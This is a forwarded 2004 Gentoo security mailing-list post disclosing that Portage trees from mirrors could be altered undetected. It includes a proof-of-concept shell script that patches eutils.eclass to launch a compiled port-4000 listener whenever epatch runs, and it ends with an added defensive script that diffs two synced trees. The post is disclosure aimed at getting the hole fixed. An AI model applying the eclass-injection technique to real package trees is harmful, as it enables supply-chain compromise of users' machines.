perhaps some motivation for portage devs....

-------- Original Message --------
Subject: [gentoo-security] Trojan for Gentoo, part 2
Date: Sat, 06 Nov 2004 21:16:11 +0100
From: Alexander Holler <holler@××××××××××.de>
To: gentoo-security@l.g.o

Hi,

after 1.5 years (2 years after the bug could be found in bugzilla) it
seems that one of the highest security risks is closed. At least I've
seen something about signed ebuilds. (see
http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ).

Time for the next part. I've already written a bug for that a year ago,
but it was now closed a second time by "the ... gatekeeper".

See bug #26110

Here's the next small script. If you are operating a gentoo mirror, or
having access to one, feel free to play with it.

If you are a user, the only practical way to ensure a minimum of
security is to sync twice:
(a) sync,
(b) delete timestamp,
(c) sync with other mirror and
(d) look if no files were different, otherwise restart with (a)

----------------gentooTrojan.sh---------------------------
#!/bin/sh
if [ ${#} -ne 1 ] ; then
    echo "This script puts a silly trojan into Gentoo's portage."
    echo "Usage: `basename ${0}` PathToPortage"
    exit 1
fi

mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass
sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with telnet localhost 4000.\nKill it with killall GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:' <${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass
cat >${1}/eclass/GentooTrojan.c << EOF
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <string.h>

int main(void)
{
    struct sockaddr_in serv;
    struct sockaddr_in cli;
    int sock;
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0)
        return 1;
    bzero((char *) &serv, sizeof(serv));
    serv.sin_family = AF_INET;
    serv.sin_addr.s_addr = htonl(INADDR_ANY);
    serv.sin_port = htons(4000);
    if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0)
        return 1;
    if (listen(sock, 5) < 0)
        return 1;
    while (1) {
        int scli;
        int slen;
        static char *str="Your are listing to the famous Gentoo trojan!\n";
        slen = sizeof(cli);
        scli = accept(sock, (struct sockaddr *) &cli,
                      (socklen_t *) &slen);
        write(scli, str, strlen(str));
        close(scli);
    }
}
EOF

gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c

echo "Done. Portage successful infected with a trojan."
echo "Just emerge an ebuild which uses epatch and do a"
echo " telnet localhost 4000"
echo "afterwards."
-------------------------------------------

Kind regards,

Alexander Holler


PS: Please don't reply to me, I don't read any Gentoo mailing lists
anymore, in fact I even don't know why I'm writing this message, as I
already have lost every interest in Gentoo some time ago.

PPS: Sorry for those hard words, but that all reminds me of Microsoft.
The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting
forgotten, ignored or fixed at the same time.

PPPS: I really appreciate all the very good work on hardened gcc,
selinux-profiles and so on, but for me, this all seems useless as long
as the base is compromised that easily and the user has no practical way
(e.g. hashes) to check what he gets on his machine with a 'sync'.

--
gentoo-security@g.o mailing list

--
gentoo-dev@g.o mailing list
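
The comparison in step (d) of the sync-twice check described in the forwarded message, as an added example that is not part of the original post or of Portage. It assumes the two syncs have already been done into two separate directories (the sync commands are not shown), that the per-mirror timestamp files live under `metadata/timestamp*`, and that `sha256sum` and `readlink` are installed; the function names are made up for this example.

```sh
#!/bin/sh
# Added example (not from the original post): check that two copies of the
# Portage tree, synced from two different mirrors, are file-for-file identical.
LC_ALL=C; export LC_ALL

# tree_manifest DIR: print "sha256  ./path" for each regular file and
# "symlink->target  ./path" for each symlink. metadata/timestamp* is skipped
# (assumed location of the per-mirror timestamp files, which always differ).
tree_manifest() {
    ( cd "$1" || exit 2
      { find . -type f ! -path './metadata/timestamp*' -exec sha256sum {} +
        find . -type l -exec sh -c 'for l in "$@"; do
            printf "symlink->%s  %s\n" "$(readlink "$l")" "$l"; done' sh {} +
      } | sort )
}

# tree_diff DIR_A DIR_B: print each path that differs or exists in only one
# tree. Returns 0 if the trees match, 1 if they differ, 2 on error.
tree_diff() {
    td_a=$(mktemp) || return 2
    td_b=$(mktemp) || { rm -f "$td_a"; return 2; }
    td_rc=0
    if tree_manifest "$1" >"$td_a" && tree_manifest "$2" >"$td_b"; then
        # comm -3 keeps only manifest lines unique to one side; strip the
        # column indent and the hash so that only the path remains.
        td_out=$(comm -3 "$td_a" "$td_b" |
                 sed -e 's/^[[:space:]]*//' -e 's/^[^ ]*  //' | sort -u)
        if [ -n "$td_out" ]; then
            printf '%s\n' "$td_out"
            td_rc=1
        fi
    else
        td_rc=2
    fi
    rm -f "$td_a" "$td_b"
    return "$td_rc"
}

# Usage: sh compare-trees.sh TREE_FROM_MIRROR_1 TREE_FROM_MIRROR_2
if [ "$#" -eq 2 ]; then
    if tree_diff "$1" "$2"; then
        echo "Trees are identical."
    else
        echo "Trees differ or could not be read: restart with step (a)." >&2
        exit 1
    fi
fi
```

A match only shows that both mirrors served the same files; it does not detect a change made upstream of both mirrors.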